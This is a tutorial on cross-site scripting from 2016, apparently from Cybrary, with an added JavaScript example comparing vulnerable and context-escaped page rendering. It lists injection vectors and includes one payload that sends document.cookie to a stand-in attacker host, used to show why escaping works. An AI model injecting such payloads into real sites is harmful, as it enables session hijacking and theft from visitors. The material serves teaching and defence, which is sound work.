
XSS Explained - From Theory to Practice


By: Dr3AMCoDeR

December 25, 2016

Hi there Cybrarians!

As always, I should thank all of you for your support. I'm really happy that my articles are helpful to most of you, and now I'm back with another article. Let's also greet the moderators, who are doing a great job with our content on Cybrary.

I was recently asked to explain in depth how XSS attacks work, so in this article I want to show you what XSS is, how an attacker might use it, and how a developer can protect an application from this kind of attack. This article is for educational purposes only and I won't be responsible for any misuse. I won't answer anything that is not within the frame "Ethical and Ethical only".

1. What is an XSS Attack?

XSS stands for Cross-Site Scripting. It is abbreviated XSS rather than CSS to avoid confusion with Cascading Style Sheets. It is a client-side code injection attack: the attacker gets a malicious script (commonly called a "payload") into a legitimate website or web application, and that script runs in the browser of whoever visits the page, with the same privileges as the site's own scripts. The injection point may be on the server (a stored comment, a reflected search parameter) or purely in the client (a DOM sink such as innerHTML), but the payload always executes on the client side, in the victim's browser.

In this article, I will assume that you have background knowledge of how client-server architectures work in general, so we can move straight on to XSS. In case you don't remember what I am talking about, here is a reminder. A typical web application consists of the following elements:

- The frontend (the look of a web page, described with HTML, CSS, JavaScript, etc.). The browser knows how to interpret this code and show it as a visual representation.
- The backend (the logic and the functionality, written in programming languages like Java, C#, PHP, etc.).
- The database (the container for the data the application keeps).

2. How can attackers make an XSS Attack?

In this scenario, we always need three parties: a hosted website, an attacker, and the victim. As we said earlier, the attack (the payload) needs to be injected into a legitimate website. What does that mean?
It means that the attacker needs to find a way to use an input field (or any other value the application echoes back: a URL query parameter, an HTTP header, a stored profile field) to "inject" the script, so that when the application places that value into a page, the browser treats it as code and executes it. The attacker's script is then delivered to the site's visitors, and the JavaScript can change the visual representation of the page, redirect the user to another link, or collect data from the browser (usually the attacker wants the session cookie), which can result in session hijacking, and so on. If the web application is vulnerable to XSS, it delivers the malicious script to the visitor, and the visitor's browser runs it: for a reflected payload the victim usually has to be tricked into opening a crafted link, while for a stored payload simply loading the page is enough.

XSS attacks can be written in VBScript, ActiveX and Flash, but they are mostly written in JavaScript, because JavaScript is turned on by default in all browsers, whereas VBScript and ActiveX only ever worked in Internet Explorer and Flash has reached end of life.

3. List of most used XSS Vectors
<Script> tag:
<script src=""></script>
<script>alert("Boo!");</script>
<Body> tag:
<body onload="alert('I am evil')">
<body background="javascript:alert('So Evil')">
<Img> tag:
<img src="javascript:alert('Evil');">
<img dynsrc="javascript:alert('Bad')">
<img lowsrc="javascript:alert('So bad!')">
<Iframe> tag:
<iframe src="">
<Input> tag:
<input type="image" src="javascript:alert('Evil work');">
<Link> tag:
<link rel="stylesheet" href="javascript:alert('Evil');">
<Table> tag:
<table background="javascript:alert('Evil')">
<td background="javascript:alert('So evil')">
<Object> tag:
<object type="text/x-scriptlet" data="">
<Div> tag:
<div style="background-image: url(javascript:alert('Evil'))">

These examples are only a few of the best known; the idea is to show you the shapes an attacker would inject. A caveat for anyone testing with them: the entries that put a javascript: URL into an image source, a background attribute, a stylesheet href or a CSS url() date from the Internet Explorer and Netscape era, and no current browser executes them; dynsrc, lowsrc and text/x-scriptlet were IE-only features. What still fires in every browser today is a <script> tag, an event handler attribute such as onload or onerror, and a javascript: URL in a navigable location (an iframe src, or a link the victim clicks). As you can see, if there is a vulnerable field, the injected text is parsed as code that runs in the victim's browser; it might be used to trick the victim into clicking something, and it can also collect data and send it to the attacker.

4. How to protect from XSS?

If you want to protect your application from XSS attacks, please make sure that you follow these rules (they are the rules of the OWASP XSS Prevention Cheat Sheet, which is the place to read the details):

1. Never insert untrusted data except in allowed locations.
2. HTML-escape before inserting untrusted data into HTML element content.
3. Attribute-escape before inserting untrusted data into HTML common attributes.
4. JavaScript-escape before inserting untrusted data into JavaScript data values.
5. HTML-escape JSON values in an HTML context and read the data with JSON.parse.
6. URL-escape before inserting untrusted data into HTML URL parameter values.
7. Sanitize HTML markup with a library designed for the job.
8. Prevent DOM-based XSS.
9. Use the HttpOnly cookie flag.
10. Use an auto-escaping template system and implement a Content Security Policy.

Two things to keep in mind when applying them: escaping is context-specific, so the same string needs different encoding in element content, in an attribute, inside a script block and inside a URL (rules 2 to 6 are separate rules for a reason), and the HttpOnly flag only keeps the session cookie out of document.cookie; an injected script can still do everything else the logged-in user can do, so it mitigates cookie theft, not XSS itself.

Feel free to read more about these things on Google. Thank you for reading my article, and feel free to share and support.
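As an added example (this is not code from the original article), here is the vulnerable-versus-hardened pattern that rules 2, 3, 4 and 6 above describe, in JavaScript: a small search-page renderer that concatenates the query into three different HTML contexts, next to the same renderer with context-appropriate encoding, plus a URL check that rejects the javascript: scheme behind most of the vectors in section 3. The renderer, the payload and the host attacker.example are constructed for illustration.

```javascript
// Added example, not code from the original article. The search-page
// renderer, the payload and the host attacker.example are constructed here
// for illustration; the escaping functions follow the OWASP rules listed above.

// Vulnerable: the query is concatenated into three contexts (element content,
// a quoted attribute, a JavaScript string) with no encoding at all.
function renderSearchVulnerable(q) {
  return '<h2>Results for ' + q + '</h2>' +
         '<input name="q" value="' + q + '">' +
         '<script>var lastQuery = "' + q + '";</script>';
}

// HTML element content: encode the five characters that can change how the
// parser reads the surrounding markup.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(s).replace(/[&<>"']/g, c => map[c]);
}

// HTML attribute values: encode every non-alphanumeric code point as &#xHH;,
// so the value can never terminate its attribute, quoted or not.
function escapeAttr(s) {
  return String(s).replace(/[^A-Za-z0-9]/gu,
    c => '&#x' + c.codePointAt(0).toString(16).toUpperCase() + ';');
}

// JavaScript data values: emit a quoted JS string literal and additionally
// \u-escape < > & so the text "</script>" can never close the enclosing block.
function jsStringLiteral(s) {
  return JSON.stringify(String(s))
    .replace(/</g, '\\u003C')
    .replace(/>/g, '\\u003E')
    .replace(/&/g, '\\u0026');
}

// URLs: parse with the URL API, which normalises the scheme and strips the
// whitespace and control-character tricks, then accept only http(s). This is
// what defeats the javascript: vectors in section 3. The base is only there so
// relative paths are accepted; the site's real origin would be used in practice.
function safeUrl(s) {
  let u;
  try { u = new URL(String(s), 'https://example.invalid/'); } catch (e) { return null; }
  return (u.protocol === 'http:' || u.protocol === 'https:') ? u.href : null;
}

// Hardened renderer: same markup, each insertion encoded for its own context.
function renderSearchSafe(q) {
  return '<h2>Results for ' + escapeHtml(q) + '</h2>' +
         '<input name="q" value="' + escapeAttr(q) + '">' +
         '<script>var lastQuery = ' + jsStringLiteral(q) + ';</script>';
}

// A link whose target comes from the user: URL check first, then attribute
// encoding of the (now known-safe) result; rejected targets fall back to "/".
function renderLink(href, text) {
  const target = safeUrl(href) || '/';
  return '<a href="' + escapeAttr(target) + '">' + escapeHtml(text) + '</a>';
}

// Constructed payload: closes the attribute or string it lands in, then plants
// a script that ships document.cookie to the attacker (classic cookie theft).
const payload = '"><script>new Image().src="https://attacker.example/?c="+document.cookie</script>';

// Count opening <script tags: the vulnerable page gains three extra ones (one per
// context the payload landed in); the safe page keeps only its own.
function demo() {
  const vulnerable = renderSearchVulnerable(payload);
  const safe = renderSearchSafe(payload);
  return {
    vulnerableScriptTags: (vulnerable.match(/<script/g) || []).length,
    safeScriptTags: (safe.match(/<script/g) || []).length,
  };
}

console.log(demo());
console.log(renderLink("javascript:alert('Evil')", 'Home'));
```

Note that the three encoders are deliberately not interchangeable: escapeHtml would leave a space or an equals sign untouched inside an unquoted attribute, and neither escapeHtml nor escapeAttr does anything useful inside a script block, which is why the safe renderer picks a different function for each insertion point.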